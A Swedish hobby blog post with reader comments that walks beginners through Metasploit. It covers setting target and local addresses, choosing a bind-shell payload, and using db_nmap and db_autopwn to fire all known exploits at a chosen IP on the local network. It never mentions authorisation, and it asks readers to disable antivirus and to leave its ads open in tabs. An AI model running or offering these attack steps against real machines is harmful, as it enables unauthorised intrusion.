måndag 9 maj 2011

Metaspl0it

Idag ska vi gå igenom metasploit.
Metasploit är ett säkerhetsverktyg som hittar svagheter, vi kommer använda det för att hitta säkerhetshål i måldatorn.

Vad behöver vi för det här? vilka os fungerar den på?
Den fungerar på Olika linux distributioner (Finns redan i backtrack) och även för windows för dom som vill testa där :) (notera att om du är windows användare måste du avaktivera ditt antivirus)

Alla kan besöka deras hemsida http://www.metasploit.com/
Läs lite innan ni börjar så ni får en uppfattning om vad vi kommer göra!

För er på ubuntu och windows kan ladda hem programmet från deras hemsida, på windows är det bara att avaktivera antivirus och på linux behövs det lite mer men allt står på deras hemsida.

Hela programmet är i text form och inte i grafiskt gränssnitt.

När ni väl har installerat det så kan ni starta upp det. ( skriv "msfconsole"  i backtrack för att starta, och i ubuntu är det oftast sökvägen sen ./msfconsole, det kan variera hur ni har det men allt står på deras hemsida)

GLÖM INTE ATT VARA ROOT NÄR NI BÖRJAR MED ALLT!

vi kommer börja med att uppdatera metasploit
* svn update
* msfupdate
det skriver ni i metasploit fönstret.

Förhoppningsvis har allt gått bra annars rekomenderar jag er att Googla eller att söka på något forum, ni måste lära er att klara av saker själva! :)

tänk att en Payload är en instans på måldatorn som går att aktivera och en exploit är det säkerhetshålet som gör att vi nu kan aktivera det.
 det är kanske inte riktigt är det, men så att ni kan förstå så är det ett bra exempel.

Show options = visar alternativ

om ni ska använda en viss payload så kan vi skriva:
set PAYLOAD generic/shell_bind_tcp (då använder vi generic/shell_bind_tcp payloaden)
om vi vill använda någon annan payload så skriv bara "show payloads" så får ni se alla.

set RHOST = då sätter vi måldatorns ip tex,  Exempel: set RHOST 192.168.0.5
set LHOST = lokala ip:n, exempel: set LHOST 192.168.0.4
set LPORT = porten som vi väljer som Payloaden kommer öppna . exepel: set LPORT 443
exploit = du aktiverar det hela i stort sätt.

Vi tar som ett exempel:

set RHOST 192.168.0.5
set LHOST 192.168.0.4
set LPORT 443
set PAYLOAD generic/shell_bind_tcp
exploit

ni kan använda olika exploits och olika payloads, bara att utforska och försök mesta del på egen hand. (så ni lär er)

Kommer även visa er ett enklare i nästa inlägg (imorgon) och kanske effektivare sätt men vill att ni ska förstå det ovan innan jag visar nästa steg.


||||||||||||||||||||||||||||||||||||||||   EDIT|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

Det är inte så himla säkert att man hittar något säkerhetshål om nu den du attackerar har bra antivirus + uppdaterat system.
Vilket inte kommer resulterat några sårbarheter.

Däremot! istället för att skriva och pröva alla olika 300 sårbarigheter (payloads/exploits)
så kan vi köra alla i en enda instans, enkelt och effektivt.

Låt oss säga att vi sitter i ett lokalt nätverk.
Först så skapar vi en datorbas (vilket ni kan ta bort om ni vill efter ni är klara)

db_create "namn"    

sen väljer vi våran "driver" vilket kommer vara:

db_driver sqlite3

Nu kan du (om du vill och behöver) öppna ett till terminal fönster och köra nmap så du kan se alla datorer i nätverket. (se tidigare inlägg för beskrivning för nmap)

Välj vilken ip du ska köra attacken mot och skriv (i metasploit fönstret) nmap "ip:n du valt"

tex: nmap 192.168.0.76

sen skriver du simpelt nog:

db_autopwn -p -t -e

så kör du alla tänkbara sårbarheter mot den ip du skrev.

Det ska vara allt och skriv i kommentarerna om du behöver hjälp


|||| EXEMPEL||||||||||||||||

db_create hej
db_driver sqlite3
db_nmap 192.168.0.65
db_autopwn -p -t- e

sessions -i

(om du lyckas ser du det och kan gå vidare genom "sessions")
(som jag skrivit förut att ni kan hjälpa mig att hålla uppe bloggen genom att trycka upp min reklam på sidan i nya flikar och låta dom vara där ett tag sen stänga dom, det hjälper mig jätte mycket och tackar alla som stödjer mig)

MvH/

Ninja :)

6 kommentarer:

  1. fan jag fattar inte me exploit den säger bara unknown commando vad jag än gör och jag har försökt massa jag skriver inte bara efter första försökert :(

    SvaraRadera
  2. @xxxxx, prova skriv db_driver sqlite3 först.
    Använd google!! Hade ungefär samma problem som dig men jag GOOGLAR och lär mig något själv, kommer inte hit och gnäller det första jag gör ;)
    Lycka till!

    "OT": Fick till det till slut iaf, yaay :) Synd bara att min dator inte var sårbar, haha. Hade ju varit roligt om det hade funkat, men samtidigt så är det inte roligt om någon skulle göra det på mig, så får väl vara lycklig att det INTE funkar :)
    Fortsätt gärna med metasploit, man kan göra så mycket med det och det är skoj att fippla runt lite med det.

    /Toad

    SvaraRadera
  3. Roligt att du gillar det toad :)

    SvaraRadera
  4. när jag skriver in db_create hej så står det så här: Unknown command: create. kan nån hjälpa mig???

    SvaraRadera
  5. @Edvin

    Pröva att uppdatera till framework 4
    ( msfupdate eller genom svn )
    Skriv "help" eller skriv "man msfconsole" innan du går in i programmet.
    det finns dokumentation på det hela.
    Återkom om det är något mer och var inte rädd för att skriva en förfrågan om ni vill att jag ska lära er något!

    //
    Ninja

    SvaraRadera
  6. Jag har testat allting som du har sagt men det fungerar ändå inte. Går det att ominstallera metasploit eller nånting.?n

    SvaraRadera